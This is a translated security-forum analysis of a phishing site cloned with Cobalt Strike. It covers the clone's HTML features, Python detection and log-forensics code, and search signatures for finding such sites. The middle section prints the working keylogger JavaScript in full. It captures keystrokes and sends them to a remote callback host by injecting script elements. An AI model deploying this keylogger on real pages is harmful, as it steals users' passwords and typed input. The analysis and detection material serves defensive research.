Analysis of a Cobalt Strike (CS) phishing clone website


Author: 黑客倉庫站長 (hackersec verified member, administrator)

Analysis process

CS site clone

[Figure: cs钓鱼克隆网站分析-1.png]




Comparison of the cloned HTML with the original HTML

[Figure: cs钓鱼克隆网站分析-2.png]




Features:

  1. The IFRAME tag is uppercase, with width and height 0.
  2. The script tag loads a JS file at the path "/jquery/jquery.min.js".

Ordering features:

  1. When the IFRAME tag and the script tag both appear, the order is always IFRAME tag, script tag, then the body tag.
  2. When only one of the IFRAME tag or the script tag appears, it is always placed before the closing body tag (</body>).
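The two tag features and the ordering rule above can be turned into a response-body check. The following is an added example, not code from the original post: a Python fingerprint function run over constructed HTML samples, one shaped like the clone, one benign page that also loads jQuery from its head, and one that carries only the script tag. It reads "before the body tag" the way the search signatures at the end of the post encode it, with the last matched tag sitting directly in front of </body>. The sample HTML, the placeholder attacker host and the function names are assumptions.

```python
import re

# Constructed samples (not from the post). The clone-shaped page carries both
# features described above; the benign page also loads jQuery but from <head>
# and has a normal lowercase iframe with a real size; the third page carries
# only the script tag, placed directly before </body>.
CLONE_HTML = """<html><head> <base href="http://www.example.com/"> <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico"></head>
<body><form>login form</form><IFRAME SRC="http://[attacker-host]/" WIDTH="0" HEIGHT="0"></IFRAME><script src="/jquery/jquery.min.js"></script> </body></html>"""

BENIGN_HTML = """<html><head><title>x</title><script src="/jquery/jquery.min.js"></script></head>
<body><iframe src="https://www.example.com/widget" width="300" height="200"></iframe><p>hello</p></body></html>"""

SCRIPT_ONLY_HTML = """<html><body><p>x</p><script src="/jquery/jquery.min.js"></script></body></html>"""

# Feature 1: uppercase IFRAME tag with width and height 0 (case-sensitive on purpose).
IFRAME_RE = re.compile(r'<IFRAME\b[^>]*\bWIDTH="0"\s+HEIGHT="0"[^>]*>\s*</IFRAME>')
# Feature 2: a script element loading exactly /jquery/jquery.min.js.
SCRIPT_RE = re.compile(r'<script\b[^>]*\bsrc="/jquery/jquery\.min\.js"[^>]*>\s*</script>', re.I)
BODY_END_RE = re.compile(r'</body>', re.I)


def fingerprint(html):
    """Return the matched features and whether their placement matches the clone."""
    iframe = IFRAME_RE.search(html)
    script = SCRIPT_RE.search(html)
    body_end = BODY_END_RE.search(html)
    features = []
    if iframe:
        features.append("zero-size uppercase IFRAME")
    if script:
        features.append("script src=/jquery/jquery.min.js")
    if not features or body_end is None:
        return {"features": features, "order_ok": False, "clone": False}
    # Ordering rule: IFRAME, then script, then </body>. Whichever of the two is
    # present must come before </body>, and the last one sits directly in front
    # of it (only whitespace between), as the search signatures below encode.
    tags = [m for m in (iframe, script) if m]
    positions = [m.start() for m in tags] + [body_end.start()]
    order_ok = (positions == sorted(positions)
                and html[tags[-1].end():body_end.start()].strip() == "")
    return {"features": features, "order_ok": order_ok, "clone": order_ok}


if __name__ == "__main__":
    for name, page in (("clone", CLONE_HTML), ("benign", BENIGN_HTML), ("script-only", SCRIPT_ONLY_HTML)):
        print(name, fingerprint(page))
```

The benign page is not flagged even though it loads /jquery/jquery.min.js, because the tag sits in the head rather than directly before </body>; the ordering rule is what keeps the jQuery feature from matching ordinary sites.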

Analysis of the referenced JS:


```javascript
var cfqPdaQzXzSSf = 0;
window.onload = function loadfqPdaQzXzSSf() { // page-load handler
    lfqPdaQzXzSSf = ",";
    if (window.addEventListener) { // register handlers for the specified events
        document.addEventListener('keypress', pfqPdaQzXzSSf, true); // keypress: fires for all keys whether or not they produce a character value; handler: pfqPdaQzXzSSf
        document.addEventListener('keydown', dfqPdaQzXzSSf, true); // keydown: fires when a key is pressed; handler: dfqPdaQzXzSSf
    } else if (window.attachEvent) { // attachEvent is supported in IE versions below 9; everything else supports addEventListener
        document.attachEvent('onkeypress', pfqPdaQzXzSSf);
        document.attachEvent('onkeydown', dfqPdaQzXzSSf);
    } else { // neither is supported: assign the handlers directly
        document.onkeypress = pfqPdaQzXzSSf;
        document.onkeydown = dfqPdaQzXzSSf;
    }
}

function pfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which; // only set when the DOM event handler is invoked
    kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(16); // convert the key code to a string in base 16
    if (kfqPdaQzXzSSf != "d") { // arbitrary check before entering the function (0x0d, Enter, is handled by the keydown handler)
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function dfqPdaQzXzSSf(e) {
    kfqPdaQzXzSSf = (window.event) ? window.event.keyCode : e.which;
    if (kfqPdaQzXzSSf == 9 || kfqPdaQzXzSSf == 8 || kfqPdaQzXzSSf == 13) { // Tab, Backspace, Enter
        fqPdaQzXzSSf(kfqPdaQzXzSSf);
    }
}

function fqPdaQzXzSSf(kfqPdaQzXzSSf) {
    lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + ","; // append the key value to the buffer
    var tfqPdaQzXzSSf = "ZUyQXfawhPbi" + cfqPdaQzXzSSf;
    cfqPdaQzXzSSf++;
    var ffqPdaQzXzSSf;
    if (document.all && (navigator.appVersion.match(/MSIE ([\d.]+)/)[1]) <= 8.0) { // browser version check: IE 8.0 or lower
        ffqPdaQzXzSSf = document.createElement(String.fromCharCode(60) + "script name='" + tfqPdaQzXzSSf + "' id='" + tfqPdaQzXzSSf + "'" + String.fromCharCode(62) + String.fromCharCode(60) + "/script" + String.fromCharCode(62));
    } else {
        ffqPdaQzXzSSf = document.createElement("script");
        ffqPdaQzXzSSf.setAttribute("id", tfqPdaQzXzSSf);
        ffqPdaQzXzSSf.setAttribute("name", tfqPdaQzXzSSf);
    }

    var ejDBFWFHhff = '?id=' + window.location.href.split(/\?id=/)[1]; // read the id parameter from the page URL
    ffqPdaQzXzSSf.setAttribute("src", "http://10.23.66.18:8080/callback" + ejDBFWFHhff + "&data=" + lfqPdaQzXzSSf);
    ffqPdaQzXzSSf.style.visibility = "hidden";
    document.body.appendChild(ffqPdaQzXzSSf); // inserting the script element sends the key codes
    if (kfqPdaQzXzSSf == 13 || lfqPdaQzXzSSf.length > 3000) { // on Enter (or a buffer over 3000 characters) clear the lfqPdaQzXzSSf buffer
        lfqPdaQzXzSSf = ",";
    }

    setTimeout('document.body.removeChild(document.getElementById("' + tfqPdaQzXzSSf + '"))', 5000); // remove the created script element after 5 seconds
}
```


The page-load handler registers events for key presses. When an event fires, the pfqPdaQzXzSSf or dfqPdaQzXzSSf function handles it and finally calls the fqPdaQzXzSSf function, which creates a script tag whose URL carries the key codes to the remote server. The created script element is removed after a 5-second delay.


pfqPdaQzXzSSf function:
Converts the key code to a string (toString(16)) and sends it to the fqPdaQzXzSSf function.


dfqPdaQzXzSSf function:
If Tab, Backspace or Enter is pressed, calls the fqPdaQzXzSSf function to send the key code.
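From the three functions above, every callback is a GET to /callback?id=<page id>&data=<buffer>, where the buffer starts with ",", keypress codes are appended as hex strings, the keydown codes 8/9/13 are appended as decimal, every keystroke resends the whole buffer, and the buffer resets after Enter (13) or once it exceeds 3000 characters. The following added Python example, not part of the original post, uses those facts to pick such callbacks out of a constructed web-proxy log and reconstruct the exfiltrated input per id, so an incident responder can scope which credentials were exposed. The log format, client address, id value and function names are assumptions; the callback host is the one in the analysed script.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed web-proxy log (hypothetical format: timestamp client method url status).
# The victim typed "ad", Tab, "p2", Enter, then "b"; every keystroke resends the
# whole buffer, so consecutive lines are prefixes of each other until the reset.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 192.0.2.10 GET http://www.example.com/index.html 200
2024-01-01T10:00:01Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61, 200
2024-01-01T10:00:02Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61,64, 200
2024-01-01T10:00:03Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61,64,9, 200
2024-01-01T10:00:04Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61,64,9,70, 200
2024-01-01T10:00:05Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61,64,9,70,32, 200
2024-01-01T10:00:06Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,61,64,9,70,32,13, 200
2024-01-01T10:00:07Z 192.0.2.10 GET http://10.23.66.18:8080/callback?id=abc123&data=,62, 200
"""

# Shape of the buffer built by fqPdaQzXzSSf: a leading comma, then comma-terminated tokens.
BUFFER_RE = re.compile(r"^,(?:[0-9a-f]+,)*$")
SPECIAL = {8: "<BS>", 9: "<TAB>", 13: "<ENTER>"}


def is_keylogger_callback(url):
    """Match the URL shape the analysed script produces: /callback?id=...&data=,<tokens>,"""
    parts = urlsplit(url)
    if not parts.path.endswith("/callback"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    return "id" in qs and "data" in qs and BUFFER_RE.match(qs["data"][0]) is not None


def decode_buffer(data):
    """Turn one ',61,64,9,' buffer into readable text."""
    out = []
    for tok in data.split(","):
        if not tok:
            continue
        # dfqPdaQzXzSSf appends 8/9/13 as decimal, pfqPdaQzXzSSf appends hex.
        # "8" and "9" decode to the same value in either base; a hex "13" would
        # be key code 0x13 from keypress, a control character rather than a
        # printable key, so reading "13" as Enter is the safe interpretation.
        code = int(tok) if tok == "13" else int(tok, 16)
        out.append(SPECIAL.get(code, chr(code)))
    return "".join(out)


def parse_callbacks(log_text):
    """Return [(id, data)] for every keylogger callback in the log, in log order."""
    found = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[2] != "GET":
            continue
        url = fields[3]
        if not is_keylogger_callback(url):
            continue
        qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
        found.append((qs["id"][0], qs["data"][0]))
    return found


def reconstruct_sessions(callbacks):
    """Collapse the prefix-resending callbacks into the completed buffers per id."""
    last = {}      # id -> most recent buffer seen
    sessions = {}  # id -> list of decoded, completed buffers
    for page_id, data in callbacks:
        prev = last.get(page_id)
        # A buffer that is not a prefix of its successor was reset (Enter or >3000 chars).
        if prev is not None and not data.startswith(prev):
            sessions.setdefault(page_id, []).append(decode_buffer(prev))
        last[page_id] = data
    for page_id, data in last.items():  # flush whatever was still being typed
        sessions.setdefault(page_id, []).append(decode_buffer(data))
    return sessions


if __name__ == "__main__":
    for page_id, inputs in reconstruct_sessions(parse_callbacks(SAMPLE_LOG)).items():
        print(page_id, inputs)
```

The same is_keylogger_callback check is usable as a proxy or IDS rule on its own: a GET whose path ends in /callback and whose data parameter is a comma-delimited run of short hex tokens is the traffic shape this script generates, independent of the host it reports to.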


Dynamic debugging in Chrome

[Figure: cs钓鱼克隆网站分析-3.png]

Key code check





[Figure: cs钓鱼克隆网站分析-4.png]

Key code concatenation





[Figure: cs钓鱼克隆网站分析-5.png]

Script element created to send the key codes to the remote server



The password received on the CS server side

[Figure: cs钓鱼克隆网站分析-6.png]




360 cyberspace-mapping search signatures for these features:


```
response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"jquery/jquery.min.js\"></script> </body>"

response:"<head> <base href=" AND response:"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">" AND response:"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"
```



[Figure: cs钓鱼克隆网站分析-7.png]



https://mp.weixin.qq.com/s/1lZlqxTuEcS3VK1Ve8XDbA